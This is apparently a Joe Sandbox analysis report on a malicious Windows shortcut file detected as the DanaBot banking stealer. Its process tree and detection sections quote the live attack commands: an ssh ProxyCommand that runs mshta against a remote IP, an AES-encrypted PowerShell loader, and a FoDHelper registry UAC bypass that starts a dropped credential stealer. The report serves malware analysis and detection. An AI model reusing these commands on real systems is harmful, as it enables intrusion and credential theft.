Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
A4FY1OA97K.lnk

Overview

General Information

Sample name:A4FY1OA97K.lnk
renamed because original name is a hash value
Original sample name:0306addb386436ae663da152bee03226.lnk
Analysis ID:1581248
MD5:0306addb386436ae663da152bee03226
SHA1:0c35bff3dafec0f21436b6db025a24e0102ce7b7
SHA256:32a98d1b299d1feebb096cdeb38433013b7db6adf5d9923b539390d777bfac3f
Tags:lnkuser-abuse_ch
Infos:

Detection

DanaBot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected DanaBot stealer dll
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
May use the Tor software to hide its network traffic
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Bypass UAC via Fodhelper.exe
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses cmd line tools excessively to alter registry or file data
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the installation date of Windows
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Lolbin Ssh.exe Use As Proxy
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ssh.exe (PID: 4204 cmdline: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
    • conhost.exe (PID: 6372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6436 cmdline: powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://150.241.97.10/aaa.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 6404 cmdline: "C:\Windows\system32\mshta.exe" https://150.241.97.10/aaa.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
          • powershell.exe (PID: 7432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('653ADB09197706BFF248B833EA1F27F5D58878713451BA8F31B442364AD50B177565132C81A8CE0C04335FB368B1BEC213971455480775829F6BC6C5534155F957E2CFA508A5FE4C311E066403190FB60B4C1CBCAA36CDF33D5F614FD5F67A8C2528EBC6C4B5B8A0BCE76A43045B19C3EFD6F5EF3BA1ECB5686BD73B304C0491078B179DA1CA0AE1F3DA25490E7B58EE2FF863E346260ADACB21649FF36146554F42D087971F82489AB30989E3F0674F581C0CF80616E540BCAA41B0428AFCE3F21FEDF2F8472F6163E56EE7F1258524A03F60DB1043BAA3A075884983F2CF092375522F8988E476AF72DC3C2FC7ADC9FE0507992C92239AEC2429066EBBD2B17CD0CF69B5F864C012338D6D8DD368382C5160478C96E06E3861DF4B0A736F2572D32B9090B656B519C9EE189C51F0156B1592FEE6EA266869208339B1F4A4CD0C9D18D67D96F8EDEABC3C915510C81009138CDC34ED0E78C7B482DF473E7EB8A0B3B274003F057FF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C206895922FA10CFC3D057E32F3236CB84F7AE4D8C4681039F91AD409D0EE7A284E00484796BDFD0C577C1033FC2B929938AE4EBE01CA086A4EF8DF874CDFA55DE6194B2ADD9FBBDE3B65169B4CE6FC4C5D063449D421C5DF87AEB418D87EB94D8085A780CFF969515BFBEB7CDAA25C3E5DDF20FBB0A604B6DDAADCF97B9534A77F8A73360422DF52B6736926BFB5D66CED1F6F797F1B6D9ADE5E074859D887E8C3BAD2D33A412611BA85A6107B8F004E605620D5E3F4FBA15B1FF642AB09A70A27BFE4F97180E1A5489A15A3E5F7DB53356E7F7869F6731F3815B6F7E852698335FA8BAB0A12F68F66EE399CA6B7D1994FCED4BFB476066214D61A279B592BEDE9BC4173840D28016672E7995C751B825A18AD0960AFBBBA9071CC631FAD152EBE5D6DA49DB75B7BD20456369CDA6719ECA0462C83310F3F5AC28103792DEEACDFA6A31D127726B84A5A8E39A884DF8FECDA2CDEC9DC279C956D253761973C9EA36666F0C5DD4C4F3306483BF6811C7ED4F0265F0E66FF777C5BB9A9B4324C54769C9B5D706B4EC485997D1ADB50FD71564B9401E52E3A3F5CBBCCB76BED1B5CF3AF43B7E7C4C42DEA2A7F2E21992968FAA86787095556C265ABB0DB1B02F1C5C06E0B96EB6B38F98AA3878E78E92A9D5FBA55B149C8DD782681A530F1C11D94505305C1EE8EF1F25970104E28DFF99776F3628512C465DC2125A38927E4CFD827415D33DC2DE13D550C5CD8ABCD58EFF5EF4B7CDFE93710EB277C3304084BD9201E5DABDEBE54FAEF993C8A690421AB366C5CF613F7CAC0628AAD89849B65FFF1054CB508E8D107D332DE6E06598C86C6E7B2AA72A92B5D11793DA067088A83ABF915B5B690EF77973FDD05902457333BF3D9982DDC982CA6E51DE08FAEE2B7B87DC3B7D2556D18306A68F6827EB9C7A69CEA51744AC77093A6DDAFBEDE1293F9BE816EBB61F0AD6D7C6984F007AD085896B84A1791374AE2D29767FA6682B78E157C46B6B622FB0CC14FD5ACF701F64474B5D1AFBAD672C4E15EFFE1CA5FBB418A59AB3CE357C55B1CC5C02697ED0B7DC5750FF0A46291413A4591CFD4E3B029F565168AF5EE6C643BABA78A73E0E7F2E781A6F2BB5B74B6D360125440C06278E8E7AC7A76D248DB1E208518388F10A6BAB46D4C01520D56940CD56758727E9268671527569A7159B1296762DE8D769DDAF8005189ED580C0A99027D6D7C7986C91BB71BEB4CF71419813DE3CC12B2BEFEA0BD89C8803D19D50F5348E88EB7A49F42528FCF43AA90404EF92E9CD2FDCD2A250E1B94DF3BE5873BF3A7890D5E7B8654695D20530BC9EF65B371EDFBA73316E25945A063D7A28BE0F4070D89BD71D08F1EC1392620E3F9E825A74316A5E9B8A7A70C3FC14D385B0D9F2A32F105EC66DC0B66EF10CB54D88BC0C2EC3C6D8B685C4A14BBFAF410E05F6F6457D7F9DA84102A348A56A4485CC1461217FCCC817704BD60EAE9427F8F126249479DA465DD0953880B50203DFB5DF97FEC094E492A4B417CF22BF841934ED24A0B0560EBF6DC9556D5FFD9549F51C870531BFA2BCFA700AD9EF423262F03922066B86DB35AA36FA7B763DCDD7176D82F2B7AF30B64970FA776C81DE60217D00F4B33DE2484A7526D3027184AB3318A44AC8E56A23A1E7AE21C561807980C57498B0BF9EF2CB743BB88450F5E4C7BFD72EF1467CDC3C67606AB945368DED820465416BA2A5775E52744944EAC6DA3F107DC69F469ACC6AF28A5520C7CF8FF549A145DC7A79D1CA66B1BB307B8BFE97041FB1F1CD07CA9DF7DDFD418D990B4FFF0ECB1DBDCFB5AE09034756A206FCED160FB71D4F142B6F97A20C8E1DF317F55051E54E9076BE72CCAA9E3538A276B4BA3BE1FA5C23EF88B84FED88D1E3F4D6ACF1A58A49CB7C35A80F797F9F1E55D3A01B4D42B956350FAF932B55519B6F7E70D2A0C998AA611AED9BEA8A07706D8B5704FC697F2C676DC5C4C1093EFEF23707B4BD489239CB80D30338E');$PYGob=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KYLfE('4344494372736B6F7955464B61484843')),[byte[]]::new(16)).TransformFinalBlock($ggUL,0,$ggUL.Length)); & $PYGob.Substring(0,3) $PYGob.Substring(283) MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7652 cmdline: "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • reg.exe (PID: 7668 cmdline: REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • reg.exe (PID: 7684 cmdline: REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • fodhelper.exe (PID: 7700 cmdline: FoDHelper.exe MD5: 85018BE1FD913656BC9FF541F017EACD)
                • cmd.exe (PID: 7740 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • cmd.exe (PID: 7800 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user~1\AppData\Local\Temp\r.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                    • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • powershell.exe (PID: 7848 cmdline: powershell.exe -w 1 -ep Unrestricted -nop MD5: 04029E121A0CFA5991749937DD22A1D9)
                      • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7976 cmdline: "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • reg.exe (PID: 7996 cmdline: REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • reg.exe (PID: 8016 cmdline: REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • Acrobat.exe (PID: 8180 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\ggg.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
              • AcroCEF.exe (PID: 1416 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
                • AcroCEF.exe (PID: 1916 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2076 --field-trial-handle=1640,i,18218259324661631593,8502747299906731977,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
            • cmd.exe (PID: 4484 cmdline: "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • reg.exe (PID: 3036 cmdline: REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • reg.exe (PID: 6768 cmdline: REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • fodhelper.exe (PID: 1496 cmdline: FoDHelper.exe MD5: 85018BE1FD913656BC9FF541F017EACD)
                • cmd.exe (PID: 2908 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • cmd.exe (PID: 5700 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user~1\AppData\Local\Temp\r.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                    • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • mama.exe (PID: 1532 cmdline: C:\Users\user\AppData\Roaming\mama.exe MD5: 72B6B07175EF611CE7DAA959A1248AAE)
                      • cmd.exe (PID: 8004 cmdline: cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                        • conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                        • WMIC.exe (PID: 5580 cmdline: wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value MD5: E2DE6500DE1148C7F6027AD50AC8B891)
            • cmd.exe (PID: 4376 cmdline: "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • reg.exe (PID: 5296 cmdline: REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • reg.exe (PID: 5756 cmdline: REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • svchost.exe (PID: 7204 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DanaBotProofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on quality over quantity in email-based threats. DanaBots modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker.
  • SCULLY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DanaBot_stealer_dllYara detected DanaBot stealer dllJoe Security
    0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_DanaBot_stealer_dllYara detected DanaBot stealer dllJoe Security
        Process Memory Space: powershell.exe PID: 7432INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x2e12d:$b1: ::WriteAllBytes(
        • 0x2ea8f:$b1: ::WriteAllBytes(
        • 0x15bd1:$s1: -join
        • 0x16331:$s1: -join
        • 0x225f0:$s1: -join
        • 0x2e1e2:$s1: -join
        • 0x2eb44:$s1: -join
        • 0x42ed1:$s1: -join
        • 0x63733:$s1: -join
        • 0x6460c:$s1: -join
        • 0x94d3f:$s1: -join
        • 0x95ee3:$s1: -join
        • 0xbf2d7:$s1: -join
        • 0xc03bf:$s1: -join
        • 0xc1411:$s1: -join
        • 0xc63d8:$s1: -join
        • 0xc6413:$s1: -join
        • 0xc64da:$s1: -join
        • 0xc6508:$s1: -join
        • 0xc66b8:$s1: -join
        • 0xc66db:$s1: -join
        Process Memory Space: mama.exe PID: 1532JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 1 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Bypass UAC via Fodhelper.exe
          Source: Process startedAuthor: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" ", CommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: FoDHelper.exe, ParentImage: C:\Windows\System32\fodhelper.exe, ParentProcessId: 7700, ParentProcessName: fodhelper.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" ", ProcessId: 7740, ProcessName: cmd.exe
          Sigma detected: Potentially Suspicious PowerShell Child Processes
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://150.241.97.10/aaa.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://150.241.97.10/aaa.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://150.241.97.10/aaa.mp4", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5408, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://150.241.97.10/aaa.mp4, ProcessId: 6404, ProcessName: mshta.exe
          Sigma detected: Powerup Write Hijack DLL
          Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7432, TargetFilename: C:\Users\user\AppData\Local\Temp\r.bat
          Sigma detected: Suspicious MSHTA Child Process
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('653ADB09197706BFF248B833EA1F27F5D58878713451BA8F31B442364AD50B177565132C81A8CE0C04335FB368B1BEC213971455480775829F6BC6C5534155F957E2CFA508A5FE4C311E066403190FB60B4C1CBCAA36CDF33D5F614FD5F67A8C2528EBC6C4B5B8A0BCE76A43045B19C3EFD6F5EF3BA1ECB5686BD73B304C0491078B179DA1CA0AE1F3DA25490E7B58EE2FF863E346260ADACB21649FF36146554F42D087971F82489AB30989E3F0674F581C0CF80616E540BCAA41B0428AFCE3F21FEDF2F8472F6163E56EE7F1258524A03F60DB1043BAA3A075884983F2CF092375522F8988E476AF72DC3C2FC7ADC9FE0507992C92239AEC2429066EBBD2B17CD0CF69B5F864C012338D6D8DD368382C5160478C96E06E3861DF4B0A736F2572D32B9090B656B519C9EE189C51F0156B1592FEE6EA266869208339B1F4A4CD0C9D18D67D96F8EDEABC3C915510C81009138CDC34ED0E78C7B482DF473E7EB8A0B3B274003F057FF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C206895922FA10CFC3D057E32F3236CB84F7AE4D8C4681039F91AD409D0EE7A284E00484796BDFD0C577C1033FC2B929938AE4EBE01CA086A4EF8DF874CDFA55DE6194B2ADD9FBBDE3B65169B4CE6FC4C5D063449D421C5DF87AEB418D87EB94D8085A780CFF969515BFBEB7CDAA25C3E5DDF20FBB0A604B6DDAADCF97B9534A77F8A73360422DF52B6736926BFB5D66CED1F6F797F1B6D9ADE5E074859D887E8C3BAD2D33A412611BA85A6107B8F004E605620D5E3F4FBA15B1FF642AB09A70A27BFE4F97180E1A5489A15A3E5F7DB53356E7F7869F6731F3815B6F7E852698335FA8BAB0A12F68F66EE399CA6B7D1994FCED4BFB476066214D61A279B592BEDE9BC4173840D28016672E7995C751B825A18AD0960AFBBBA9071CC631FAD152EBE5D6DA49DB75B7BD20456369CDA6719ECA0462C83310F3F5AC28103792DEEACDFA6A31D127726B84A5A8E39A884DF8FECDA2CDEC9DC279C956D253761973C9EA36666F0C5DD4C4F3306483BF6811C7ED4F0265F0E66FF777C5BB9A9B4324C54769C9B5D706B4EC485997D1ADB50FD71564B9401E52E3A3F5CBBCCB76BED1B5CF3AF43B7E7C4C42DEA2A7F2E21992968FAA86787095556C265ABB0DB1B02F1C5C06E0B96EB6B38F98AA3878E78E92A9D5FBA55B149C8DD782681A530F1C11D94505305C1EE8EF1F25970104E28DFF99776F3628512C465DC2125A38927E4CFD827415D33DC2DE13D550C5CD8ABCD58EFF5EF4B7CDFE93710EB277C3304084BD9201E5DABDEBE54FAEF993C8A690421AB366C5CF613F7CAC0628AAD89849B65FFF1054CB508E8D107D332DE6E06598C86C6E7B2AA72A92B5D11793DA067088A83ABF915B5B690EF77973FDD05902457333BF3D9982DDC982CA6E51DE08FAEE2B7B87DC3B7D2556D18306A68F6827EB9C7A69CEA51744AC77093A6DDAFBEDE1293F9BE816EBB61F0AD6D7C6984F007AD085896B84A1791374AE2D29767FA6682B78E157C46B6B622FB0CC14FD5ACF701F64474B5D1AFBAD672C4E15EFFE1CA5FBB418A59AB3CE357C55B1CC5C02697ED0B7DC5750FF0A46291413A4591CFD4E3B029F565168AF5EE6C643BABA78A73E0E7F2E781A6F2BB5B74B6D360125440C06278E8E7AC7A76D248DB1E208518388F10A6BAB46D4C01520D56940CD56758727E9268671527569A7159B1296762DE8D769DDAF8005189ED580C0A99027D6D7C7986C91BB71BEB4CF71419813DE3CC12B2BEFEA0BD89C8803D19D50F5348E88EB7A49F42528FCF43AA90404EF92E9CD2FDCD2A250E1B94DF3BE5873BF3A7890D5E7B8654695D2
          Sigma detected: Change PowerShell Policies to an Insecure Level
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('653ADB09197706BFF248B833EA1F27F5D58878713451BA8F31B442364AD50B177565132C81A8CE0C04335FB368B1BEC213971455480775829F6BC6C5534155F957E2CFA508A5FE4C311E066403190FB60B4C1CBCAA36CDF33D5F614FD5F67A8C2528EBC6C4B5B8A0BCE76A43045B19C3EFD6F5EF3BA1ECB5686BD73B304C0491078B179DA1CA0AE1F3DA25490E7B58EE2FF863E346260ADACB21649FF36146554F42D087971F82489AB30989E3F0674F581C0CF80616E540BCAA41B0428AFCE3F21FEDF2F8472F6163E56EE7F1258524A03F60DB1043BAA3A075884983F2CF092375522F8988E476AF72DC3C2FC7ADC9FE0507992C92239AEC2429066EBBD2B17CD0CF69B5F864C012338D6D8DD368382C5160478C96E06E3861DF4B0A736F2572D32B9090B656B519C9EE189C51F0156B1592FEE6EA266869208339B1F4A4CD0C9D18D67D96F8EDEABC3C915510C81009138CDC34ED0E78C7B482DF473E7EB8A0B3B274003F057FF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C206895922FA10CFC3D057E32F3236CB84F7AE4D8C4681039F91AD409D0EE7A284E00484796BDFD0C577C1033FC2B929938AE4EBE01CA086A4EF8DF874CDFA55DE6194B2ADD9FBBDE3B65169B4CE6FC4C5D063449D421C5DF87AEB418D87EB94D8085A780CFF969515BFBEB7CDAA25C3E5DDF20FBB0A604B6DDAADCF97B9534A77F8A73360422DF52B6736926BFB5D66CED1F6F797F1B6D9ADE5E074859D887E8C3BAD2D33A412611BA85A6107B8F004E605620D5E3F4FBA15B1FF642AB09A70A27BFE4F97180E1A5489A15A3E5F7DB53356E7F7869F6731F3815B6F7E852698335FA8BAB0A12F68F66EE399CA6B7D1994FCED4BFB476066214D61A279B592BEDE9BC4173840D28016672E7995C751B825A18AD0960AFBBBA9071CC631FAD152EBE5D6DA49DB75B7BD20456369CDA6719ECA0462C83310F3F5AC28103792DEEACDFA6A31D127726B84A5A8E39A884DF8FECDA2CDEC9DC279C956D253761973C9EA36666F0C5DD4C4F3306483BF6811C7ED4F0265F0E66FF777C5BB9A9B4324C54769C9B5D706B4EC485997D1ADB50FD71564B9401E52E3A3F5CBBCCB76BED1B5CF3AF43B7E7C4C42DEA2A7F2E21992968FAA86787095556C265ABB0DB1B02F1C5C06E0B96EB6B38F98AA3878E78E92A9D5FBA55B149C8DD782681A530F1C11D94505305C1EE8EF1F25970104E28DFF99776F3628512C465DC2125A38927E4CFD827415D33DC2DE13D550C5CD8ABCD58EFF5EF4B7CDFE93710EB277C3304084BD9201E5DABDEBE54FAEF993C8A690421AB366C5CF613F7CAC0628AAD89849B65FFF1054CB508E8D107D332DE6E06598C86C6E7B2AA72A92B5D11793DA067088A83ABF915B5B690EF77973FDD05902457333BF3D9982DDC982CA6E51DE08FAEE2B7B87DC3B7D2556D18306A68F6827EB9C7A69CEA51744AC77093A6DDAFBEDE1293F9BE816EBB61F0AD6D7C6984F007AD085896B84A1791374AE2D29767FA6682B78E157C46B6B622FB0CC14FD5ACF701F64474B5D1AFBAD672C4E15EFFE1CA5FBB418A59AB3CE357C55B1CC5C02697ED0B7DC5750FF0A46291413A4591CFD4E3B029F565168AF5EE6C643BABA78A73E0E7F2E781A6F2BB5B74B6D360125440C06278E8E7AC7A76D248DB1E208518388F10A6BAB46D4C01520D56940CD56758727E9268671527569A7159B1296762DE8D769DDAF8005189ED580C0A99027D6D7C7986C91BB71BEB4CF71419813DE3CC12B2BEFEA0BD89C8803D19D50F5348E88EB7A49F42528FCF43AA90404EF92E9CD2FDCD2A250E1B94DF3BE5873BF3A7890D5E7B8654695D2
          Sigma detected: Lolbin Ssh.exe Use As Proxy
